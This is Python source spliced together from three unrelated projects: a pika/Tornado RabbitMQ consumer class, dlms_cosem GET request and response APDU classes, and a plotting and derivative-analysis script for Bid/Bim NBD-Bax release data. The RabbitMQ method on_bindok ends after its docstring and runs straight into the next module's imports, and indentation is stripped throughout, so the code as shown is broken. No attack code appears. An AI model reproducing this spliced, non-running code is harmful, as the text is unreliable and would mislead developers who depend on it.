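#         routing_key="demo.#",
#         passive=False,  # actively declare the exchange/queue instead of passive-checking
#     )
#     conn.connect()
#
# connect() only schedules the asynchronous setup; the Tornado IOLoop must be
# running (e.g. tornado.ioloop.IOLoop.current().start()) for the channel,
# exchange, queue and binding callbacks to fire and consumption to start.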
@exception_catch
def connect(self):
"""This method connects to RabbitMQ, returning the connection handle.
When the connection is established, the on_connection_open method
will be invoked by pika.
:rtype: pika.SelectConnection
"""
LOGGER.info('Connecting to %s', self._url)
self._connection = TornadoConnection(pika.URLParameters(self._url),
on_open_callback=self.on_connection_open,
on_open_error_callback=self.on_connection_open_error)
return self._connection
def on_connection_open_error(self, _unused_connection, err):
"""This method is called by pika if the connection to RabbitMQ
can't be established.
:param pika.SelectConnection _unused_connection: The connection
:param Exception err: The error
"""
reconnect_delay = self._get_reconnect_delay()
LOGGER.error('Connection open failed, reopening in %d seconds: %s', reconnect_delay, err)
self._connection.ioloop.call_later(reconnect_delay, self.reconnect)
def close_connection(self):
"""This method closes the connection to RabbitMQ."""
LOGGER.info('Closing connection')
self._connection.close()
def add_on_connection_close_callback(self):
"""This method adds an on close callback that will be invoked by pika
when RabbitMQ closes the connection to the publisher unexpectedly.
"""
LOGGER.info('Adding connection close callback')
self._connection.add_on_close_callback(self.on_connection_closed)
def on_connection_closed(self, connection, reason):
"""This method is invoked by pika when the connection to RabbitMQ is
closed unexpectedly. Since it is unexpected, we will reconnect to
RabbitMQ if it disconnects.
:param pika.connection.Connection connection: The closed connection obj
:param Exception reason: exception representing reason for loss of
connection.
"""
self._channel = None
if self._closing:
pass
# self._connection.ioloop.stop()
else:
reconnect_delay = self._get_reconnect_delay()
LOGGER.warning('Connection closed, reopening in %d seconds: %s',
reconnect_delay, reason)
self._connection.ioloop.call_later(reconnect_delay, self.reconnect)
def on_connection_open(self, unused_connection):
"""This method is called by pika once the connection to RabbitMQ has
been established. It passes the handle to the connection object in
case we need it, but in this case, we'll just mark it unused.
:param pika.SelectConnection _unused_connection: The connection
"""
LOGGER.info('Connection opened')
self.add_on_connection_close_callback()
self.open_channel()
def reconnect(self):
"""Will be invoked by the IOLoop timer if the connection is
closed. See the on_connection_closed method.
"""
self._was_consuming = False
self._was_publishing = False
if not self._closing:
# Create a new connection
self._connection = self.connect()
def add_on_channel_close_callback(self):
"""This method tells pika to call the on_channel_closed method if
RabbitMQ unexpectedly closes the channel.
"""
LOGGER.info('Adding channel close callback')
self._channel.add_on_close_callback(self.on_channel_closed)
def on_channel_closed(self, channel, reason):
"""Invoked by pika when RabbitMQ unexpectedly closes the channel.
Channels are usually closed if you attempt to do something that
violates the protocol, such as re-declare an exchange or queue with
different parameters. In this case, we'll close the connection
to shutdown the object.
:param pika.channel.Channel: The closed channel
:param Exception reason: why the channel was closed
"""
LOGGER.warning('Channel %i was closed: %s', channel, reason)
if self._connection.is_open:
self._connection.close()
def on_channel_open(self, channel):
"""This method is invoked by pika when the channel has been opened.
The channel object is passed in so we can make use of it.
Since the channel is now open, we'll declare the exchange to use.
:param pika.channel.Channel channel: The channel object
"""
LOGGER.info('Channel opened')
self._channel = channel
self.add_on_channel_close_callback()
self.setup_exchange(self.EXCHANGE)
if self.AE_EXCHANGE:
self.setup_ae_exchange(self.AE_EXCHANGE)
if self.DL_EXCHANGE:
self.setup_dl_exchange(self.DL_EXCHANGE)
@exception_catch
def setup_exchange(self, exchange_name):
"""Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC
command. When it is complete, the on_exchange_declareok method will
be invoked by pika.
:param str|unicode exchange_name: The name of the exchange to declare
"""
cb = functools.partial(
self.on_exchange_declareok, userdata=exchange_name)
args = {}
if self.AE_EXCHANGE:
args['alternate-exchange'] = self.AE_EXCHANGE
self._channel.exchange_declare(
passive=self._passive,
durable=self._durable,
exchange=exchange_name,
exchange_type=self.EXCHANGE_TYPE,
arguments=args,
callback=cb)
@exception_catch
def setup_ae_exchange(self, exchange_name):
"""Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC
command. When it is complete, the on_exchange_declareok method will
be invoked by pika.
:param str|unicode exchange_name: The name of the exchange to declare
"""
ae_cb = functools.partial(
self.on_ae_exchange_declareok, userdata=exchange_name)
self._channel.exchange_declare(
passive=self._passive,
durable=False,
exchange=exchange_name,
exchange_type=self.AE_EXCHANGE_TYPE,
arguments={},
callback=ae_cb)
@exception_catch
def setup_dl_exchange(self, exchange_name):
"""Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC
command. When it is complete, the on_exchange_declareok method will
be invoked by pika.
:param str|unicode exchange_name: The name of the exchange to declare
"""
cb = functools.partial(
self.on_dl_exchange_declareok, userdata=exchange_name)
self._channel.exchange_declare(
passive=self._passive,
durable=False,
exchange=exchange_name,
exchange_type=self.DL_EXCHANGE_TYPE,
arguments={},
callback=cb)
def on_exchange_declareok(self, _unused_frame, userdata):
"""Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC
command.
:param pika.Frame.Method unused_frame: Exchange.DeclareOk response frame
:param str|unicode userdata: Extra user data (exchange name)
"""
LOGGER.info('Exchange declared: %s', userdata)
self.setup_queue(self.QUEUE)
def on_ae_exchange_declareok(self, _unused_frame, userdata):
"""Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC
command.
:param pika.Frame.Method unused_frame: Exchange.DeclareOk response frame
:param str|unicode userdata: Extra user data (exchange name)
"""
LOGGER.info('Exchange declared: %s', userdata)
self.setup_ae_queue(self.AE_QUEUE)
def on_dl_exchange_declareok(self, _unused_frame, userdata):
"""Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC
command.
:param pika.Frame.Method unused_frame: Exchange.DeclareOk response frame
:param str|unicode userdata: Extra user data (exchange name)
"""
LOGGER.info('Exchange declared: %s', userdata)
self.setup_dl_queue(self.DL_QUEUE)
@exception_catch
def setup_queue(self, queue_name):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
:param str|unicode queue_name: The name of the queue to declare.
"""
LOGGER.info('Declaring queue %s', queue_name)
if self._type == 'consumer' and self.EXCHANGE_TYPE == 'x-modulus-hash':
if not self._was_consuming:
self.start_consuming()
else:
args = {}
if self.DL_EXCHANGE:
args['x-dead-letter-exchange'] = self.DL_EXCHANGE
self._channel.queue_declare(
durable=self._durable,
passive=self._passive,
queue=queue_name,
arguments=args,
callback=self.on_queue_declareok)
@exception_catch
def setup_ae_queue(self, queue_name):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
:param str|unicode queue_name: The name of the queue to declare.
"""
LOGGER.info('Declaring queue %s', queue_name)
self._channel.queue_declare(
durable=False,
passive=self._passive,
queue=queue_name,
callback=self.on_ae_queue_declareok)
@exception_catch
def setup_dl_queue(self, queue_name):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
:param str|unicode queue_name: The name of the queue to declare.
"""
LOGGER.info('Declaring queue %s', queue_name)
self._channel.queue_declare(
durable=False,
passive=self._passive,
queue=queue_name,
callback=self.on_dl_queue_declareok)
@exception_catch
def on_queue_declareok(self, _unused_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange together with the routing key by issuing the Queue.Bind
RPC command. When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
LOGGER.info('Binding %s to %s with %s', self.EXCHANGE, self.QUEUE,
self.ROUTING_KEY)
self._channel.queue_bind(
self.QUEUE,
self.EXCHANGE,
routing_key=self.ROUTING_KEY,
callback=self.on_bindok)
@exception_catch
def on_ae_queue_declareok(self, _unused_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange together with the routing key by issuing the Queue.Bind
RPC command. When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
LOGGER.info('Binding %s to %s with %s', self.AE_EXCHANGE, self.AE_QUEUE,
self.ROUTING_KEY)
self._channel.queue_bind(
self.AE_QUEUE,
self.AE_EXCHANGE,
routing_key=self.ROUTING_KEY,
callback=self.on_bindok)
@exception_catch
def on_dl_queue_declareok(self, _unused_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange together with the routing key by issuing the Queue.Bind
RPC command. When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
LOGGER.info('Binding %s to %s with %s', self.DL_EXCHANGE, self.DL_QUEUE,
self.ROUTING_KEY)
self._channel.queue_bind(
self.DL_QUEUE,
self.DL_EXCHANGE,
routing_key=self.ROUTING_KEY,
callback=self.on_bindok)
def on_bindok(self, unused_frame):
"""Invoked by pika when the Queue.Bind method has completed. At this
point we will start consuming messages by calling start_consuming
which will invoke the needed RPC commands to start the process.
"""
from functools import partial
from typing import *
import attr
import dlms_cosem.utils
from dlms_cosem import a_xdr, cosem, dlms_data
from dlms_cosem import enumerations as enums
from dlms_cosem.cosem import selective_access
from dlms_cosem.dlms_data import (
VARIABLE_LENGTH,
AbstractDlmsData,
DlmsDataFactory,
decode_variable_integer,
encode_variable_integer,
)
from dlms_cosem.protocol.xdlms.base import AbstractXDlmsApdu
from dlms_cosem.protocol.xdlms.invoke_id_and_priority import InvokeIdAndPriority
get_request_type_from_bytes = partial(enums.GetRequestType.from_bytes, byteorder="big")
get_response_type_from_bytes = partial(
enums.GetResponseType.from_bytes, byteorder="big"
)
class NullValue:
def __call__(self):
return None
def if_falsy_set_none(value):
if value:
return value
@attr.s(auto_attribs=True)
class GetRequestNormal(AbstractXDlmsApdu):
"""
Represents a Get request.
Get requests are modeled with a choice but we only support the normal one.
Get requests work in single attributes on interface classes.
To get a value you would need the interface class, the instance (OBIS) and the
attribute id.
Some attributes allow for selective access to the attributes. For example a load
profile might be read from a specific date or a specific entry.
"""
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.NORMAL
cosem_attribute: cosem.CosemAttribute = attr.ib(
validator=attr.validators.instance_of(cosem.CosemAttribute)
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
access_selection: Optional[
Union[selective_access.RangeDescriptor, selective_access.EntryDescriptor]
] = attr.ib(default=None, converter=if_falsy_set_none)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.NORMAL:
raise ValueError(
"The data for the GetRequest is not for a GetRequestNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
cosem_attribute_data = data[:9]
cosem_attribute = cosem.CosemAttribute.from_bytes(cosem_attribute_data)
data = data[9:]
has_access_selection = bool(data.pop(0))
if has_access_selection:
access_selection = selective_access.AccessDescriptorFactory.from_bytes(data)
else:
access_selection = None
return cls(
cosem_attribute=cosem_attribute,
invoke_id_and_priority=invoke_id_and_priority,
access_selection=access_selection,
)
def to_bytes(self):
# automatically adding the choice for GetRequestNormal.
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE.value)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(self.cosem_attribute.to_bytes())
if self.access_selection:
out.extend(b"\x01")
out.extend(self.access_selection.to_bytes())
else:
out.extend(b"\x00")
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestNext(AbstractXDlmsApdu):
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.NEXT
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.NEXT:
raise ValueError("The data for the GetRequest is not for a GetRequestNext")
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
assert len(data) == 4 # should only be block number left.
block_number = int.from_bytes(data, "big")
return cls(block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(self.block_number.to_bytes(4, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestWithList(AbstractXDlmsApdu):
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.WITH_LIST
cosem_attributes_with_selection: List[cosem.CosemAttributeWithSelection]
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.WITH_LIST:
raise ValueError(
"The data for the GetRequest is not for a GetRequestWithList"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
number_of_items = data.pop(0)
cosem_atts = list()
for i in range(0, number_of_items):
# Not really happy with the format of this but it works fine.
c = cosem.CosemAttributeWithSelection.from_bytes(data)
cosem_atts.append(c)
data = data[len(c.to_bytes()) :]
return cls(
cosem_attributes_with_selection=cosem_atts,
invoke_id_and_priority=invoke_id_and_priority,
)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(
encode_variable_integer(len(self.cosem_attributes_with_selection))
) # number of items
for item in self.cosem_attributes_with_selection:
out.extend(item.to_bytes())
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestFactory:
"""
The factory will parse the GetRequest and return either a GetRequestNormal,
GetRequestNext or a GetRequestWithList.
"""
TAG: ClassVar[int] = 192
@staticmethod
def from_bytes(source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != GetRequestFactory.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be "
f"{GetRequestFactory.TAG}"
)
request_type = enums.GetRequestType(data.pop(0))
if request_type == enums.GetRequestType.NORMAL:
return GetRequestNormal.from_bytes(source_bytes)
elif request_type == enums.GetRequestType.NEXT:
return GetRequestNext.from_bytes(source_bytes)
elif request_type == enums.GetRequestType.WITH_LIST:
return GetRequestWithList.from_bytes(source_bytes)
else:
raise ValueError(
f"Received an enum request type that is not valid for "
f"GetRequest: {request_type}"
)
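# Dispatch sketch (illustrative only; `raw_apdu` stands for bytes received off
# the wire and the helper name is hypothetical). It shows how the factory's
# single entry point fans out to the three concrete request classes above.
def _dispatch_get_request_example(raw_apdu: bytes):
    request = GetRequestFactory.from_bytes(raw_apdu)
    if isinstance(request, GetRequestNormal):
        # Single-attribute read, possibly with selective access.
        return request.cosem_attribute, request.access_selection
    if isinstance(request, GetRequestNext):
        # Client asks for the next block of a long response.
        return request.block_number
    # Otherwise it is a GetRequestWithList.
    return request.cosem_attributes_with_selection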
@attr.s(auto_attribs=True)
class GetResponseNormal(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.NORMAL
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
return cls(bytes(data), invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(0) # data result choice
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseNormalWithError(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.NORMAL
error: enums.DataAccessResult = attr.ib(
validator=attr.validators.instance_of(enums.DataAccessResult)
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
choice = data.pop(0)
if choice != 1:
raise ValueError(
f"The data choice is not 1 to indicate error but: {choice}"
)
error = enums.DataAccessResult(data.pop(0))
return cls(error, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # data error choice
out.extend(self.error.to_bytes(1, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseWithBlock(AbstractXDlmsApdu):
"""
The data sent in a block response is an OCTET STRING. Not instance of DLMS Data.
So it has the length encoding first.
"""
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if last_block:
raise ValueError(
f"Last block set to true in a GetResponseWithBlock. Should only be set "
f"for a GetResponseLastBlock"
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
return cls(bytes(data), block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(0) # last block == False
out.extend(self.block_number.to_bytes(4, "big"))
out.append(0) # data choice = data
out.extend(
dlms_cosem.dlms_data.encode_variable_integer(len(self.data))
) # octet string length
out.extend(self.data)
return bytes(out)
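# Illustrative sketch (not part of the original module): a hypothetical round trip
# for GetResponseWithBlock with a default InvokeIdAndPriority, assuming that
# InvokeIdAndPriority itself round-trips through its own to_bytes/from_bytes.
# No concrete byte values are asserted, since they depend on the enum and
# invoke-id encodings defined elsewhere in dlms_cosem; the point is that
# from_bytes parses the fields in exactly the order to_bytes writes them
# (tag, response type, invoke-id, last-block flag, block number, choice,
# length-prefixed octet string).
def _example_get_response_with_block_roundtrip():
    apdu = GetResponseWithBlock(data=b"\x01\x02\x03", block_number=1)
    raw = apdu.to_bytes()
    assert GetResponseWithBlock.from_bytes(raw) == apdu
    return raw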
@attr.s(auto_attribs=True)
class GetResponseLastBlock(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if not last_block:
raise ValueError(
f"Last block is not set to true in a GetResponseLastBlock."
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
return cls(bytes(data), block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # last block == True
out.extend(self.block_number.to_bytes(4, "big"))
out.append(0) # data choice = data
out.extend(
dlms_cosem.dlms_data.encode_variable_integer(len(self.data))
) # octet string length
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseLastBlockWithError(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
error: enums.DataAccessResult = attr.ib(
validator=attr.validators.instance_of(enums.DataAccessResult)
)
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
| |
plt.text(2.05, means[i, 1], nbd_sites[i], color='k',
fontsize=8)
plt.xlim(0.5, 2.5)
def plot_bid_vs_bim_release(df, nbd_sites, dtype='Release',
file_basename=None):
replicates = range(1, 4)
activators = ['Bid', 'Bim']
# Get the length of the timecourses
for nbd_index, nbd_site in enumerate(nbd_sites):
color_ix = 0
for act_ix, activator in enumerate(activators):
# Initialization for WT
wt_slice = df[activator][dtype]['WT']
wt_numpts = wt_slice.shape[0]
wt_y = np.zeros((wt_numpts, len(replicates)))
# Initialization for mutant
mut_slice = df[activator][dtype][nbd_site]
mut_numpts = mut_slice.shape[0]
mut_y = np.zeros((mut_numpts, len(replicates)))
# Iterate over reps and get data
for rep_ix, rep_num in enumerate(replicates):
# Only get the time coordinates for the first rep
if rep_ix == 0:
wt_time = wt_slice[rep_num]['TIME'].values
mut_time = mut_slice[rep_num]['TIME'].values
wt_y[:, rep_ix] = wt_slice[rep_num]['VALUE'].values
mut_y[:, rep_ix] = mut_slice[rep_num]['VALUE'].values
# Now get the averages and SDs
wt_avg = np.mean(wt_y, axis=1)
wt_sd = np.std(wt_y, axis=1, ddof=1)
wt_ubound = wt_avg + wt_sd
wt_lbound = wt_avg - wt_sd
mut_avg = np.mean(mut_y, axis=1)
mut_sd = np.std(mut_y, axis=1, ddof=1)
mut_ubound = mut_avg + mut_sd
mut_lbound = mut_avg - mut_sd
#num_colors = 4
#colors = plt.cm.Set3(np.linspace(0, 1, num_colors))
colors = ['r', 'm', 'b', 'g']
fig_name = 'bid_bim_tc_comp_%s' % nbd_site
# Plot the ratio
plt.figure(fig_name, figsize=(10, 10))
plt.subplot(1, 2, 1)
(ratio_avg, ratio_sd) = \
calc_ratio_mean_sd(mut_avg, mut_sd, wt_avg, wt_sd)
plt.plot(wt_time, ratio_avg, color=colors[color_ix],
label=activator)
plt.fill_between(wt_time, ratio_avg + ratio_sd,
ratio_avg - ratio_sd, alpha=0.5,
color=colors[color_ix])
plt.legend(loc='upper right', fontsize=10)
plt.ylim(0, 5)
# Plot the raw timecourses for WT and mutant
# Plot the mutant
plt.subplot(1, 2, 2)
plt.plot(wt_time, mut_avg, color=colors[color_ix],
label='%s, NBD-%sC-Bax' % (activator, nbd_site))
plt.fill_between(wt_time, mut_ubound, mut_lbound,
color=colors[color_ix], alpha=0.2)
color_ix += 1
# Plot the WT
plt.plot(wt_time, wt_avg, color=colors[color_ix],
label='%s, WT Bax' % activator)
plt.fill_between(wt_time, wt_ubound, wt_lbound,
color=colors[color_ix], alpha=0.3)
plt.legend(loc='lower right', fontsize=10)
color_ix += 1
if file_basename:
plt.savefig('%s_%s.pdf' % (file_basename, fig_name))
plt.savefig('%s_%s.png' % (file_basename, fig_name))
def calc_release_peaks(df, nbd_sites, activators=None, replicates=None,
window=1, csv_filename=None):
"""Measure the lag phase of the release data.
Takes the derivative of the release data for the given set of
activators, NBD sites, and replicates, and gets the time associated
with the peak of the derivative.
Returns
-------
Dictionary containing keys of the form (activator, nbd_site, replicate)
mapped to the times of the maximum rate of release.
"""
# Set some defaults
if activators is None:
activators = ['Bid', 'Bim']
if replicates is None:
replicates = range(1, 4)
peak_dict = collections.OrderedDict()
# Initialize the filter
b, a = scipy.signal.butter(1, 0.2)
for activator, nbd_site, rep_index in \
itertools.product(activators, nbd_sites, replicates):
key = (activator, nbd_site, rep_index)
# Get the data
rt = df[(activator, 'Release', nbd_site,
rep_index, 'TIME')].values
ry = df[(activator, 'Release', nbd_site,
rep_index, 'VALUE')].values
# Apply the filter
# Filter the timecourse
r_filt = scipy.signal.filtfilt(b, a, ry)
r_avg = moving_average(r_filt, n=window)
# Take the derivative
r_diff = np.diff(r_avg)
# When we take the derivative, the size of the array shrinks by
# one, because we are calculating the differences between neighboring
# elements. So if the data is [0, 1, 3, 4, 5], the derivatives will
# be [1, 2, 1, 1], and the maximum of the derivative array will be at
# index 1, which corresponds to the difference of two and the entry of
# three in the original array. If we adopt the convention that the
# index to use for the maximum slope is the latter of the two values
# used in calculating the difference, this means we need to add one to
# the index associated with the maximum value of the diff array.
r_max_tpt = np.argmax(r_diff) + 1
peak_dict[key] = rt[r_max_tpt]
if csv_filename:
with open(csv_filename, 'w') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
for key, value in peak_dict.items():
line = list(key)
line.append(value)
csv_writer.writerow(line)
return peak_dict
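# Illustrative sketch (not from the original script): reporting the time of maximum
# release rate for a couple of hypothetical NBD sites. It assumes `df` has the same
# (activator, datatype, site, replicate, TIME/VALUE) column layout used throughout
# this module; the site labels '3' and '15' are placeholders.
def _example_release_peak_report(df):
    peaks = calc_release_peaks(df, ['3', '15'], activators=['Bid'], window=1)
    for (activator, site, rep), peak_time in peaks.items():
        print('%s NBD-%sC rep %d: max release rate at t = %.1f s'
              % (activator, site, rep, peak_time))
    return peaks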
def plot_example_derivatives(df, activator, nbd_site, rep_index, window=1,
normalize_nbd=False, plot_filename=None,
plot_tb_peak=False):
set_fig_params_for_publication()
# Create an order 3 lowpass butterworth filter.
b, a = scipy.signal.butter(1, 0.2)
# RELEASE DERIVATIVE
rt = df[(activator, 'Release', nbd_site, rep_index, 'TIME')].values
ry = df[(activator, 'Release', nbd_site, rep_index, 'VALUE')].values
# Filter the timecourse
r_filt = scipy.signal.filtfilt(b, a, ry)
r_avg = moving_average(r_filt, n=window)
# Take the derivative
r_diff = np.diff(r_avg)
# Peak release derivative
r_max_tpt = np.argmax(r_diff) + 1
peak_pt = rt[r_max_tpt]
# NBD DERIVATIVE
nt = df[(activator, 'NBD', nbd_site, rep_index, 'TIME')].values
ny = df[(activator, 'NBD', nbd_site, rep_index, 'VALUE')].values
# Normalize NBD to F/F0
if normalize_nbd:
ny = ny / float(ny[0])
# Filter
n_filt = scipy.signal.filtfilt(b, a, ny)
n_avg = moving_average(n_filt, n=window)
# Take derivative
n_diff = np.diff(n_avg)
# PLOT
fig = plt.figure(figsize=(1.5, 1.5), dpi=300)
ax = fig.gca()
n_diff_norm = n_diff / np.max(np.abs(n_diff))
r_diff_norm = r_diff / np.max(np.abs(r_diff))
ax.plot(nt[1+window-1:], n_diff_norm, label=r'$\frac{d}{dt}$ NBD')
ax.plot(rt[1+window-1:], r_diff_norm, color='r',
